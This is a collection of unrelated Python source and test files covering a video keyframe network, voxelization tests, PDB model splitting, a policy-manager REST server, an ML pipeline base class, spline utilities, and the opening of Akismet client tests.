self.layer4 = nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1, groups=1, bias=False, dilation=1)
self.bn_l4 = nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.Drr = nn.Parameter(Drr, requires_grad=True)
self.Dtheta = nn.Parameter(Dtheta, requires_grad=True)
'embeded infomation along time space'
if self.config == 'Penn':
self.fcn1 = nn.Conv2d(self.num_frame, 25, kernel_size=1, stride=2, padding=0, groups=1, bias=False, dilation=1)
self.fc = nn.Linear(2560, self.num_frame)
else:
self.fcn1 = nn.Conv2d(self.num_frame, 25, kernel_size=1, stride=1, padding=0, groups=1, bias=False,
dilation=1)
self.fc = nn.Linear(5760, self.num_frame)
self.bn2 = nn.BatchNorm2d(25, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.fcn2 = nn.Conv2d(25, 10, kernel_size=1, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn3 = nn.BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.avg_pool = nn.AdaptiveAvgPool2d((1,1))
self.sig = nn.Sigmoid()
def forward(self, x):
Dictionary = creatRealDictionary(self.num_frame, self.Drr, self.Dtheta, self.gpu_id)
imageFeature = self.modifiedResnet(x) # T X 512 X 7 X 7
if self.backbone == 'Resnet34' or 'Resnet18':
convx = imageFeature
else:
convx = self.Conv2d(imageFeature)
convx = self.bn1(convx)
convx = self.relu(convx)
x2 = self.layer2(convx)
x2 = self.bn_l2(x2)
x2 = self.relu(x2)
x3 = self.layer3(x2)
x3 = self.bn_l3(x3)
x3 = self.relu(x3)
x4 = self.layer4(x3)
x4 = self.bn_l4(x4)
feature = self.relu(x4)
return feature, Dictionary, imageFeature
def forward2(self, feature, alpha):
x = feature.permute(1, 0, 2, 3)
x = self.fcn1(x)
x = self.bn2(x)
x = self.relu(x)
x = self.fcn2(x)
x = self.bn3(x)
x = self.relu(x)
x = x.view(1, -1)
x = self.fc(x)
out = self.sig(alpha*x)
return out
class onlineUpdate(nn.Module):
def __init__(self, FRA, PRE, T, Drr, Dtheta, gpu_id):
super(onlineUpdate, self).__init__()
self.gpu_id = gpu_id
self.Drr = Drr
self.Dtheta = Dtheta
self.numFrame = T
self.K_FPN = keyframeProposalNet(numFrame=self.numFrame, Drr=self.Drr, Dtheta=self.Dtheta, gpu_id=gpu_id,
backbone='Resnet18', config='jhmdb')
self.FRA = FRA
self.PRE = PRE
self.relu = nn.LeakyReLU(inplace=True)
self.layer0 = nn.Conv2d(512*2, 512, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l0 = nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer1 = nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l1 = nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer2 = nn.Conv2d(256, 128, kernel_size=1, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l2 = nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer3 = nn.Conv2d(128, 64, kernel_size=1, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l3 = nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.fc = nn.Linear(1*64*3*3, 2)
def get_keylist(self, x, alpha):
feature, Dictionary, imgFeature = self.K_FPN.forward(x)
indicator = self.K_FPN.forward2(feature, alpha)
s = indicator[0, :]
key_ind = (s > 0.995).nonzero().squeeze(1)
key_list_tot = key_ind.cpu().numpy()
key_list_FRA = list(key_list_tot[np.where(key_list_tot < self.FRA)[0]]) # input key list
key_list = list(key_list_tot[np.where(key_list_tot < self.PRE+ self.FRA)[0]])
keylist_to_pred = list(set(key_list) - set(key_list_FRA))
Dict_key = Dictionary[key_list_FRA, :]
feat_key = imgFeature[key_list_FRA, :]
t, c, w, h = feat_key.shape
feat_key = feat_key.reshape(1, t, c * w * h)
sparseCode_key = fista(Dict_key, feat_key, 0.01, 100, self.gpu_id)
return sparseCode_key, Dictionary, keylist_to_pred, key_list_FRA, key_list,imgFeature
def forward(self, imgFeature, sparseCode_key, Dictionary, fraNum):
gtImgFeature = imgFeature[fraNum]
c, w, h = gtImgFeature.shape
newDictionary = torch.cat((Dictionary[0:self.FRA], Dictionary[fraNum].unsqueeze(0)))
newImgFeature = torch.matmul(newDictionary, sparseCode_key).reshape(newDictionary.shape[0], c, w, h)
predImgFeature = newImgFeature[-1]
combineFeature = torch.cat((gtImgFeature, predImgFeature)).unsqueeze(0)
x = self.layer0(combineFeature)
x = self.bn_l0(x)
x = self.relu(x)
x = self.layer1(x)
x = self.bn_l1(x)
x = self.relu(x)
x = self.layer2(x)
x = self.bn_l2(x)
x = self.relu(x)
x = self.layer3(x)
x = self.bn_l3(x)
x = self.relu(x)
x = x.view(1, -1)
out = self.fc(x)
return out
if __name__ == "__main__":
gpu_id = 2
alpha = 4 # step size for sigmoid
N = 4 * 40
P, Pall = gridRing(N)
Drr = abs(P)
Drr = torch.from_numpy(Drr).float()
Dtheta = np.angle(P)
Dtheta = torch.from_numpy(Dtheta).float()
net = keyframeProposalNet(numFrame=40,Drr=Drr, Dtheta=Dtheta, gpu_id=gpu_id, backbone='Resnet34', config='Penn')
net.cuda(gpu_id)
X = torch.randn(1, 40, 3, 224, 224).cuda(gpu_id)
for i in range(0, X.shape[0]):
x = X[i]
feature,dictionary,_ = net.forward(x)
out = net.forward2(feature, alpha)
print('check')
print('done')
|
1698306
|
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pytest
from SphereVoxelization_fft import compute_2d, compute_3d
import freud
matplotlib.use("agg")
class TestSphereVoxelization:
def test_random_points_2d(self):
width = 100
r_max = 10.0
num_points = 10
box_size = r_max * 10
box, points = freud.data.make_random_system(box_size, num_points, is2D=True)
for w in (width, (width, width), [width, width]):
vox = freud.density.SphereVoxelization(w, r_max)
# Test access
with pytest.raises(AttributeError):
vox.box
with pytest.raises(AttributeError):
vox.voxels
vox.compute(system=(box, points))
# Test access
vox.box
vox.voxels
# Verify the output dimensions are correct
assert vox.voxels.shape == (width, width)
assert np.prod(vox.voxels.shape) == np.prod(vox.width)
# Verify the calculation is correct
# here we assert that the calculations (from two different methods)
# are the same up to rounding error
fft_vox = compute_2d(box_size, width, points, r_max)
num_same = len(
np.where(np.isclose(vox.voxels - fft_vox, np.zeros(fft_vox.shape)))[0]
)
total_num = np.prod(fft_vox.shape)
assert num_same / total_num > 0.95
# Verify that the voxels are all 1's and 0's
num_zeros = len(
np.where(np.isclose(vox.voxels, np.zeros(vox.voxels.shape)))[0]
)
num_ones = len(
np.where(np.isclose(vox.voxels, np.ones(vox.voxels.shape)))[0]
)
assert num_zeros > 0
assert num_ones > 0
assert num_zeros + num_ones == np.prod(vox.voxels.shape)
def test_random_points_3d(self):
width = 100
r_max = 10.0
num_points = 10
box_size = r_max * 10
box, points = freud.data.make_random_system(box_size, num_points, is2D=False)
for w in (width, (width, width, width), [width, width, width]):
vox = freud.density.SphereVoxelization(w, r_max)
# Test access
with pytest.raises(AttributeError):
vox.box
with pytest.raises(AttributeError):
vox.voxels
vox.compute(system=(box, points))
# Test access
vox.box
vox.voxels
# Verify the output dimensions are correct
assert vox.voxels.shape == (width, width, width)
# Verify the calculation is correct
# here we assert that the calculations (from two different methods)
# are the same up to rounding error
fft_vox = compute_3d(box_size, width, points, r_max)
num_same = len(
np.where(np.isclose(vox.voxels - fft_vox, np.zeros(fft_vox.shape)))[0]
)
total_num = np.prod(fft_vox.shape)
assert num_same / total_num > 0.95
# Verify that the voxels are all 1's and 0's
num_zeros = len(
np.where(np.isclose(vox.voxels, np.zeros(vox.voxels.shape)))[0]
)
num_ones = len(
np.where(np.isclose(vox.voxels, np.ones(vox.voxels.shape)))[0]
)
assert num_zeros > 0
assert num_ones > 0
assert num_zeros + num_ones == np.prod(vox.voxels.shape)
def test_change_box_dimension(self):
width = 100
r_max = 10.0
num_points = 100
box_size = r_max * 3.1
# test that computing a 3D system after computing a 2D system will fail
box, points = freud.data.make_random_system(box_size, num_points, is2D=True)
vox = freud.density.SphereVoxelization(width, r_max)
vox.compute(system=(box, points))
test_box, test_points = freud.data.make_random_system(
box_size, num_points, is2D=False
)
with pytest.raises(ValueError):
vox.compute((test_box, test_points))
# test that computing a 2D system after computing a 3D system will fail
box, points = freud.data.make_random_system(box_size, num_points, is2D=False)
vox = freud.density.SphereVoxelization(width, r_max)
vox.compute(system=(box, points))
test_box, test_points = freud.data.make_random_system(
box_size, num_points, is2D=True
)
with pytest.raises(ValueError):
vox.compute((test_box, test_points))
def test_repr(self):
vox = freud.density.SphereVoxelization(100, 10.0)
assert str(vox) == str(eval(repr(vox)))
# Use both signatures
vox3 = freud.density.SphereVoxelization((98, 99, 100), 10.0)
assert str(vox3) == str(eval(repr(vox3)))
def test_repr_png(self):
width = 100
r_max = 10.0
num_points = 100
box_size = r_max * 3.1
box, points = freud.data.make_random_system(box_size, num_points, is2D=True)
vox = freud.density.SphereVoxelization(width, r_max)
with pytest.raises(AttributeError):
vox.plot()
assert vox._repr_png_() is None
vox.compute((box, points))
vox.plot()
vox = freud.density.SphereVoxelization(width, r_max)
test_box = freud.box.Box.cube(box_size)
vox.compute((test_box, points))
vox.plot()
assert vox._repr_png_() is None
plt.close("all")
|
1698312
|
from __future__ import absolute_import, division, print_function
# LIBTBX_SET_DISPATCHER_NAME iotbx.pdb.split_models
from libtbx.utils import Sorry, Usage, null_out
import os
import sys
master_phil = """
split_models
.short_caption = Split multi-model PDB file
.caption = This utility will separate a multi-model PDB file (such as an \
NMR ensemble) into individual files for each model. The output files \
will be named similarly to the input file but ending in _1.pdb, _2.pdb, \
etc.
.style = auto_align box caption_img:icons/custom/iotbx.pdb.join_fragment_files.png
{
file_name = None
.type = path
.short_caption = PDB file
.style = file_type:pdb input_file bold
output_dir = None
.type = path
.short_caption = Output directory
.style = directory default_cwd bold
}
"""
def run(args=(), params=None, out=None):
if (out is None):
out = sys.stdout
if (params is None):
if (len(args) == 0):
raise Usage("""
iotbx.pdb.split_models ensemble.pdb [output_dir=/path/...]
Splits a multi-model PDB file into separate files for each model.
""")
import iotbx.phil
cmdline = iotbx.phil.process_command_line_with_files(
args=args,
master_phil_string=master_phil,
pdb_file_def="split_models.file_name",
directory_def="split_models.output_dir")
params = cmdline.work.extract()
validate_params(params)
from iotbx import file_reader
pdb_in = file_reader.any_file(params.split_models.file_name, force_type="pdb")
pdb_in.check_file_type("pdb")
hierarchy = pdb_in.file_object.hierarchy
if (len(hierarchy.models()) <= 1):
raise Sorry("The PDB file %s already has a single model." %
params.split_models.file_name)
pdb_rel_path = os.path.basename(params.split_models.file_name)
if (pdb_rel_path.endswith(".gz")):
pdb_rel_path = pdb_rel_path[:-3]
elif (pdb_rel_path.endswith(".Z")):
pdb_rel_path = pdb_rel_path[:-2]
base_name = os.path.splitext(pdb_rel_path)[0]
if (params.split_models.output_dir is None):
params.split_models.output_dir = os.getcwd()
output_base = os.path.join(params.split_models.output_dir, base_name)
return split_models(
hierarchy=hierarchy,
crystal_symmetry=pdb_in.file_object.crystal_symmetry(),
output_base=output_base,
original_file=params.split_models.file_name,
log=out)
def split_models(hierarchy,
crystal_symmetry,
output_base,
original_file=None,
log=None):
if (log is None) : log = null_out()
import iotbx.pdb.hierarchy
n_models = len(hierarchy.models())
file_names = []
for k, model in enumerate(hierarchy.models()):
k += 1
new_hierarchy = iotbx.pdb.hierarchy.root()
new_hierarchy.append_model(model.detached_copy())
if (model.id == ""):
model_id = str(k)
else :
model_id = model.id.strip()
output_file = "%s_%s.pdb" % (output_base, model_id)
f = open(output_file, "w")
if (crystal_symmetry is not None):
print(iotbx.pdb.format_cryst1_and_scale_records(
crystal_symmetry=crystal_symmetry,
write_scale_records=True), file=f)
print("REMARK Model %d of %d" % (k, n_models), file=f)
if (original_file is not None):
print("REMARK Original file:", file=f)
print("REMARK %s" % original_file, file=f)
f.write(new_hierarchy.as_pdb_string())
f.close()
file_names.append(output_file)
print("Wrote %s" % output_file, file=log)
return file_names
def validate_params(params):
if (params.split_models.file_name is None):
raise Sorry("Please specify a PDB file to split!")
elif (not os.path.isfile(params.split_models.file_name)):
raise Sorry("The PDB file '%s' does not exist or is not a file." %
params.split_models.file_name)
if (params.split_models.output_dir is not None):
if (not os.path.isdir(params.split_models.output_dir)):
raise Sorry(("The specified output directory '%s' does not exist or is "+
"not a directory.") % params.split_models.output_dir)
return True
if (__name__ == "__main__"):
run(sys.argv[1:])
|
1698336
|
import asyncio
import json
import logging
import random
from contextlib import suppress
import pmdefaults as PM
try:
import aiohttp
from aiohttp import web
except ImportError as e:
web = None
logging.warning("aiohttp in required to start the REST interface, but it is not installed")
try:
resthelper_loaded = True
import resthelper
except ImportError as e:
resthelper_loaded = False
profiles = None
cib = None
pib = None
server = None
app = None
loop = None
def gen_hello_msg():
host_info = {'host-uid': PM.CLIENT_UID,
'management-address': PM.REST_IP,
'rest-port': PM.REST_PORT,
'client-type': 'neat'}
if resthelper_loaded:
ips = resthelper.get_local_ips()
host_info['local-addresses'] = ips
else:
logging.warning('Local addresses not available')
hello_msg = json.dumps({"input": host_info})
return hello_msg
async def controller_announce():
"""
Register NEAT client with a remote controller
and send hello message every PM.CONTROLLER_ANNOUNCE seconds
"""
if not PM.CONTROLLER_REST:
return
while True:
sleep_time = min(random.expovariate(1 / PM.CONTROLLER_ANNOUNCE), PM.CONTROLLER_ANNOUNCE * 3)
print("Notifying controller at %s (repeat in %1.0fs)" % (PM.CONTROLLER_REST, sleep_time))
conn = aiohttp.TCPConnector(local_addr=(PM.REST_IP, 0))
auth = aiohttp.BasicAuth(PM.CONTROLLER_USER, PM.CONTROLLER_PASS)
async with aiohttp.ClientSession(connector=conn, auth=auth) as session:
try:
async with session.post(PM.CONTROLLER_REST, data=gen_hello_msg(),
headers={'content-type': 'application/json'}) as resp:
# logging.debug('announce addr: %s:%s' % resp.connection._protocol.transport.get_extra_info('sockname'))
if resp.status != 200:
logging.warning("Controller provided an invalid response")
print(resp)
html = await resp.text()
except (ValueError, aiohttp.ClientConnectionError) as e:
print(e)
await asyncio.sleep(sleep_time)
async def handle_refresh(request):
logging.info("Reloading PIB...")
pib.reload_files()
logging.info("Reloading profiles...")
profiles.reload_files()
logging.info("Reloading CIB...")
cib.reload_files()
return web.Response(text='PM repositories reloaded.')
async def handle_pib(request):
uid = request.match_info.get('uid')
if uid is None:
text = json.dumps(list(pib.index.keys()))
return web.Response(text=text)
logging.info("PIB request for uid %s" % (uid))
try:
text = pib.index[uid].json()
except KeyError as e:
return web.Response(status=404, text='unknown UID')
return web.Response(text=text)
async def handle_pib_put(request):
"""
Test using: curl -H 'Content-Type: application/json' -T test.policy localhost:45888/pib/23423
"""
assert request.content_type == 'application/json'
uid = request.match_info.get('uid')
logging.info("Received new policy entry with uid \'%s\'" % (uid))
new_policy = await request.text()
pib.import_json(new_policy, uid)
return web.Response(text="OK")
async def handle_pib_delete(request):
"""
Delete PIB entry with specific UID
Test using: curl -H 'Content-Type: application/json' -X DELETE localhost:45888/pib/1234
"""
assert request.content_type == 'application/json'
uid = request.match_info.get('uid')
logging.info("Removing policy entry with uid \'%s\'" % (uid))
try:
pib.remove(uid)
except KeyError:
text = "Policy not found (uid \'%s\')." % uid
logging.warning(text)
return web.Response(status=404, text=text)
return web.Response(text="Policy removed")
async def handle_cib_rows(request):
rows = []
for i in cib.rows:
rows.append(i.dict())
text = json.dumps(rows, indent=4)
return web.Response(text=text)
async def handle_cib(request):
uid = request.match_info.get('uid')
if uid is None:
text = json.dumps(list(cib.keys()))
return web.Response(text=text)
logging.info("CIB request for uid %s" % (uid))
try:
text = cib[uid].json()
except KeyError as e:
return web.Response(status=404, text='unknown UID')
return web.Response(text=text)
async def handle_cib_put(request):
uid = request.match_info.get('uid')
if uid is None:
text = json.dumps(list(cib.keys()))
return web.Response(text=text)
assert request.content_type == 'application/json'
logging.info("new CIB entry with uid %s" % (uid))
new_cib = await request.text()
cib.import_json(new_cib, uid)
return web.Response(text="OK")
async def handle_cib_delete(request):
"""
Delete CIB node with specific UID
Test using: curl -H 'Content-Type: application/json' -X DELETE localhost:45888/cib/1234
"""
assert request.content_type == 'application/json'
uid = request.match_info.get('uid')
logging.info("Removing CIB node with uid \'%s\'" % (uid))
try:
cib.remove(uid)
except KeyError:
text = "CIB node not found (uid \'%s\')." % uid
logging.warning(text)
return web.Response(status=404, text=text)
return web.Response(text="CIB node removed")
async def handle_rest(request):
name = str(request.match_info.get('name')).lower()
if name not in ('pib', 'cib'):
# FIXME return proper response
return web.Response(status=404)
uid = request.match_info.get('uid', 0)
text = "request for %s %s" % (name, uid)
return web.Response(text=text)
def init_rest_server(asyncio_loop, profiles_ref, cib_ref, pib_ref, rest_port=None):
"""
Initialize and register REST server.
"""
if web is None:
logging.info("REST server not available because the aiohttp module is not installed.")
return
global pib, cib, profiles, port, server, loop, app
loop = asyncio_loop
cib = cib_ref
pib = pib_ref
profiles = profiles_ref
if rest_port:
PM.REST_PORT = rest_port
pmrest = web.Application()
app = pmrest
pmrest.router.add_get('/', handle_rest)
pmrest.router.add_get('/reload', handle_refresh)
pmrest.router.add_get('/pib', handle_pib)
pmrest.router.add_get('/pib/{uid}', handle_pib)
pmrest.router.add_get('/cib', handle_cib)
pmrest.router.add_get('/cib/{uid}', handle_cib)
pmrest.router.add_get('/cib/rows', handle_cib_rows)
pmrest.router.add_put('/cib/{uid}', handle_cib_put)
pmrest.router.add_put('/pib/{uid}', handle_pib_put)
pmrest.router.add_delete('/pib/{uid}', handle_pib_delete)
pmrest.router.add_delete('/cib/{uid}', handle_cib_delete)
handler = pmrest.make_handler()
f = asyncio_loop.create_server(handler, PM.REST_IP, PM.REST_PORT)
print("Initializing REST server on %s:%d" % (PM.REST_IP, PM.REST_PORT))
try:
server = asyncio_loop.run_until_complete(f)
except OSError as e:
print(e)
return
asyncio.ensure_future(controller_announce())
def close():
# cancel all running tasks:
pending = asyncio.Task.all_tasks()
for task in pending:
task.cancel()
# Now we should await task to execute it's cancellation.
# Cancelled task raises asyncio.CancelledError that we can suppress:
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
# TODO implement http://aiohttp.readthedocs.io/en/stable/web.html#graceful-shutdown
server.close()
loop.run_until_complete(server.wait_closed())
loop.run_until_complete(app.shutdown())
loop.run_until_complete(app.cleanup())
|
1698339
|
from pyhafas import HafasClient
from pyhafas.profile import VSNProfile
def test_vsn_locations_request():
client = HafasClient(VSNProfile())
locations = client.locations(term="Göttingen Bahnhof/ZOB")
assert len(locations) >= 1
|
1698344
|
from typing import Callable
import pytest
from tests.taxonomy.conftest import TestDirectory, validate_taxonomy
@pytest.mark.parametrize(
"defect",
[(1, 79), (2, 120), (3, 122), (4, 86), (5, 40)],
)
def test_xbps(defect, defect_path: Callable[[int, int], TestDirectory], gitenv):
index, case = defect
test_dir = defect_path(index, case)
validate_taxonomy(test_dir, index, case)
|
1698357
|
import requests, os
import json
is_prod = True
webhook_url = os.environ.get('SLACKBOT_WEBHOOK_URL', '')
def post_health(message):
if not is_prod:
return
r = requests.post(webhook_url, data=json.dumps({"text": message}), headers={'content-type':'application/json'})
return r
|
1698376
|
from time import time
import numpy as np
from cd4ml.get_encoder import get_trained_encoder
from cd4ml.logger.fluentd_logging import FluentdLogger
from cd4ml.model_tracking import tracking
from cd4ml.model_tracking.validation_metrics import get_validation_metrics
from cd4ml.utils.problem_utils import Specification
from cd4ml.ml_model import MLModel
from cd4ml.feature_importance import get_feature_importance
from cd4ml.splitter import splitter
from cd4ml.model_tracking.validation_plots import get_validation_plot
from cd4ml.utils.utils import get_uuid
from pathlib import Path
import json
import logging
logger = logging.getLogger(__name__)
class ProblemBase:
"""
Generic Problem Interface for Problems
Implementation needs to add various data elements and methods
"""
def __init__(self,
problem_name,
data_downloader='default',
ml_pipeline_params_name='default',
feature_set_name='default',
algorithm_name='default',
algorithm_params_name='default'):
# this is the unique identifier for every model created
self.model_id = get_uuid()
self.logger = logging.getLogger(__name__)
self.fluentd_logger = FluentdLogger()
self.data_downloader = data_downloader
self.problem_name = problem_name
self.feature_set_name = feature_set_name
self.ml_pipeline_params_name = ml_pipeline_params_name
self.algorithm_name = algorithm_name
self.algorithm_params_name = algorithm_params_name
self.ml_pipeline_params = self.get_ml_pipeline_params(ml_pipeline_params_name)
self.logger.info("Created model_id: %s" % self.model_id)
if algorithm_name == 'default':
self.resolved_algorithm_name = self.ml_pipeline_params['default_algorithm']
else:
self.resolved_algorithm_name = algorithm_name
self.specification = self.make_specification()
# methods to be implemented
# when called on pipeline_params, returns a data stream
self._stream_data = None
# when given a row of data, returns True or False depending on
# whether is in training or validation
# override if need a special case
self.training_filter = None
self.validation_filter = None
# function which runs on a function returning an iterable
# of (true, predicted) values
# and returns a dictionary of metrics
# might have to run multiple times so needs to create new
# streams when called
self.get_validation_metrics = None
# filled in by methods in base class
self.trained_model = None
self.validation_metrics = None
self.encoder = None
self.ml_model = None
self.tracker = None
self.feature_data = None
self.importance = None
self.training_filter, self.validation_filter = splitter(self.ml_pipeline_params)
feature_set_class = self.get_feature_set_constructor(feature_set_name)
self.feature_set = feature_set_class(self.ml_pipeline_params['identifier_field'],
self.ml_pipeline_params['target_field'],
{})
self.algorithm_params = self.get_algorithm_params(self.resolved_algorithm_name,
self.algorithm_params_name)
def stream_processed(self):
return self._stream_data(self.problem_name)
def stream_features(self):
return (self.feature_set.features(processed_row) for processed_row in self.stream_processed())
def prepare_feature_data(self):
pass
def get_encoder(self, write=False, read_from_file=False):
# TODO: train on all features of just training?
self.prepare_feature_data()
start = time()
ml_fields = self.feature_set.ml_fields()
omitted = self.feature_set.params['encoder_untransformed_fields']
self.encoder = get_trained_encoder(self.stream_features(),
ml_fields,
self.problem_name,
write=write,
read_from_file=read_from_file,
base_features_omitted=omitted)
self.encoder.add_numeric_stats(self.stream_features())
runtime = time() - start
self.logger.info('Encoder time: {0:.1f} seconds'.format(runtime))
def training_stream(self):
return (row for row in self.stream_processed() if self.training_filter(row))
def validation_stream(self):
return (row for row in self.stream_processed() if self.validation_filter(row))
def train(self):
if self.ml_model is not None:
self.logger.warning('Model is already trained, cannot retrain')
return
self.logger.info('Starting training')
start = time()
if self.encoder is None:
self.get_encoder()
self.ml_model = MLModel(self.specification.spec['algorithm_name_actual'],
self.algorithm_params,
self.feature_set,
self.encoder,
self.ml_pipeline_params['training_random_seed'])
if self.tracker:
self.tracker.log_algorithm_params(self.algorithm_params)
self.ml_model.train(self.training_stream())
model_name = self.specification.spec['algorithm_name_actual']
self.importance = get_feature_importance(self.ml_model.trained_model, model_name, self.encoder)
runtime = time() - start
self.logger.info('Training time: {0:.1f} seconds'.format(runtime))
def true_target_stream(self, stream):
target_name = self.feature_set.target_field
return (row[target_name] for row in stream)
def _write_validation_info(self):
true_validation_target = list(self.true_target_stream(self.validation_stream()))
validation_predictions = list(self.ml_model.predict_processed_rows(self.validation_stream()))
if self.tracker:
if self.ml_model.model_type == 'regressor':
validation_plot = get_validation_plot(true_validation_target,
validation_predictions)
self.tracker.log_validation_plot(validation_plot)
self.tracker.log_metrics(self.validation_metrics)
self.fluentd_logger.log('validation_metrics', self.validation_metrics)
def validate(self):
# a batch step
self.logger.info('Starting validating')
start = time()
logger.info('Getting predictions')
true_validation_target = list(self.true_target_stream(self.validation_stream()))
validation_prediction = list(self.ml_model.predict_processed_rows(self.validation_stream()))
if self.ml_model.model_type == 'classifier':
validation_pred_prob = np.array(list(self.ml_model.predict_processed_rows(self.validation_stream(),
prob=True)))
target_levels = self.ml_model.trained_model.classes_
elif self.ml_model.model_type == 'regressor':
validation_pred_prob = None
target_levels = None
else:
raise ValueError('Do not understand classification type: %s' % self.ml_model.model_type)
logger.info('Done with predictions')
self.logger.info('Getting validation metrics')
validation_metric_names = self.ml_pipeline_params['validation_metric_names']
self.validation_metrics = get_validation_metrics(validation_metric_names,
true_validation_target,
validation_prediction,
validation_pred_prob,
target_levels)
self.logger.info('Writing validation info')
self._write_validation_info()
runtime = time() - start
self.logger.info('Validation time: {0:.1f} seconds'.format(runtime))
def write_ml_model(self):
self.tracker.log_model(self.ml_model)
def setup_tracker(self):
self.tracker = tracking.Track(self.model_id, self.specification.spec)
def run_all(self):
start = time()
self.setup_tracker()
self.tracker.log_ml_pipeline_params(self.ml_pipeline_params)
self.download_data()
self.get_encoder()
self.train()
self.write_ml_model()
self.validate()
runtime = time() - start
self.tracker.save_results()
self.logger.info('All ML steps time: {0:.1f} seconds'.format(runtime))
self.logger.info('Finished model: %s' % self.model_id)
def download_data(self):
raise ValueError("This function should be implemented in a parent class")
@staticmethod
def get_feature_set_constructor(feature_set_name):
raise NotImplementedError("This function should be implemented in a parent class")
def get_ml_pipeline_params(self, ml_pipeline_params_name):
path = 'ml_pipelines/{}.json'.format(ml_pipeline_params_name)
return self.read_json_file_for_current_problem_as_dict(path)
def get_algorithm_params(self, algorithm_name, algorithm_params_name):
path = 'algorithms/{}/{}.json'.format(algorithm_name, algorithm_params_name)
return self.read_json_file_for_current_problem_as_dict(path)
def make_specification(self):
return Specification(self.problem_name,
self.data_downloader,
self.ml_pipeline_params_name,
self.feature_set_name,
self.algorithm_name,
self.algorithm_params_name,
self.resolved_algorithm_name)
def read_json_file_for_current_problem_as_dict(self, file_path):
path = Path(Path(__file__).parent, self.problem_name, file_path)
with open(path, "r") as file:
return json.load(file)
def __repr__(self):
# make it printable
messages = ['Problem']
for k, v in self.__dict__.items():
if v is None:
continue
if str(v.__class__) == "<class 'function'>":
continue
messages.append("%s: \n%s\n" % (k, v))
return '\n'.join(messages)
|
1698384
|
import numpy as np
import scipy.interpolate as si
def euclidean_distance(a, b):
diff = a - b
return np.sqrt(np.dot(diff, diff))
# source: https://stackoverflow.com/questions/34803197/fast-b-spline-algorithm-with-numpy-scipy
def bspline(cv, n=100, degree=3, periodic=False):
"""Calculate n samples on a bspline
cv : Array ov control vertices
n : Number of samples to return
degree: Curve degree
periodic: True - Curve is closed
"""
cv = np.asarray(cv)
count = cv.shape[0]
# Closed curve
if periodic:
kv = np.arange(-degree, count + degree + 1)
factor, fraction = divmod(count + degree + 1, count)
cv = np.roll(np.concatenate((cv,) * factor + (cv[:fraction],)), -1, axis=0)
degree = np.clip(degree, 1, degree)
# Opened curve
else:
degree = np.clip(degree, 1, count - 1)
kv = np.clip(np.arange(count + degree + 1) - degree, 0, count - degree)
# Return samples
max_param = count - (degree * (1 - periodic))
spl = si.BSpline(kv, cv, degree)
return spl(np.linspace(0, max_param, n))
# from https://en.wikipedia.org/wiki/Centripetal_Catmull%E2%80%93Rom_spline
def CatmullRomSpline(P0, P1, P2, P3, nPoints=100):
"""
P0, P1, P2, and P3 should be (x,y) point pairs that define the Catmull-Rom spline.
nPoints is the number of points to include in this curve segment.
"""
# Convert the points to numpy so that we can do array multiplication
P0, P1, P2, P3 = map(np.array, [P0, P1, P2, P3])
# Calculate t0 to t4
alpha = 0.5
def tj(ti, Pi, Pj):
xi, yi = Pi
xj, yj = Pj
return (((xj - xi) ** 2 + (yj - yi) ** 2) ** 0.5) ** alpha + ti
t0 = 0
t1 = tj(t0, P0, P1)
t2 = tj(t1, P1, P2)
t3 = tj(t2, P2, P3)
# Only calculate points between P1 and P2
t = np.linspace(t1, t2, nPoints)
# Reshape so that we can multiply by the points P0 to P3
# and get a point for each value of t.
t = t.reshape(len(t), 1)
A1 = (t1 - t) / (t1 - t0) * P0 + (t - t0) / (t1 - t0) * P1
A2 = (t2 - t) / (t2 - t1) * P1 + (t - t1) / (t2 - t1) * P2
A3 = (t3 - t) / (t3 - t2) * P2 + (t - t2) / (t3 - t2) * P3
B1 = (t2 - t) / (t2 - t0) * A1 + (t - t0) / (t2 - t0) * A2
B2 = (t3 - t) / (t3 - t1) * A2 + (t - t1) / (t3 - t1) * A3
C = (t2 - t) / (t2 - t1) * B1 + (t - t1) / (t2 - t1) * B2
return C
def CatmullRomChain(P, n_points=100):
"""
Calculate Catmull Rom for a chain of points and return the combined curve.
"""
sz = len(P)
# The curve C will contain an array of (x,y) points.
C = []
for i in range(sz - 3):
c = CatmullRomSpline(P[i], P[i + 1], P[i + 2], P[i + 3], nPoints=n_points)
C.extend(c)
return C
def catmull_rom_spline(coords, n_points=10):
coords = list(map(np.array, coords))
coords.insert(0, coords[0] - (coords[1] - coords[0]))
coords.append(coords[-1] + (coords[-1] - coords[-2]))
c = CatmullRomChain(coords, n_points=n_points)
return np.array(c)
|
1698393
|
from __future__ import with_statement
import datetime
import sys
import os
try:
from urllib.parse import parse_qsl
except ImportError:
from urlparse import parse_qsl
import requests
import requests_mock
from requests.exceptions import ConnectTimeout
from akismet import Akismet, SpamStatus, AKISMET_CHECK_URL, AKISMET_DOMAIN, AKISMET_VERSION, AKISMET_SUBMIT_SPAM_URL, \
AKISMET_SUBMIT_HAM_URL
from akismet.exceptions import AkismetServerError, MissingParameterError
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
USER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0'
EVIL_USER_AGENT = 'Bot Evil/0.1'
class TestAkismet(unittest.TestCase):
akismet = None
def setUp(self):
self.api_key = 'mock'
self.is_test = True
self.blog = 'http://127.0.0.1'
self.user_ip = '127.0.0.1'
self.akismet = Akismet('mock', is_test=self.is_test)
self.mock = requests_mock.Mocker()
self.mock.start()
def tearDown(self):
self.mock.stop()
def _get_url(self, url_format, api_key=None):
return url_format.format(
protocol='https',
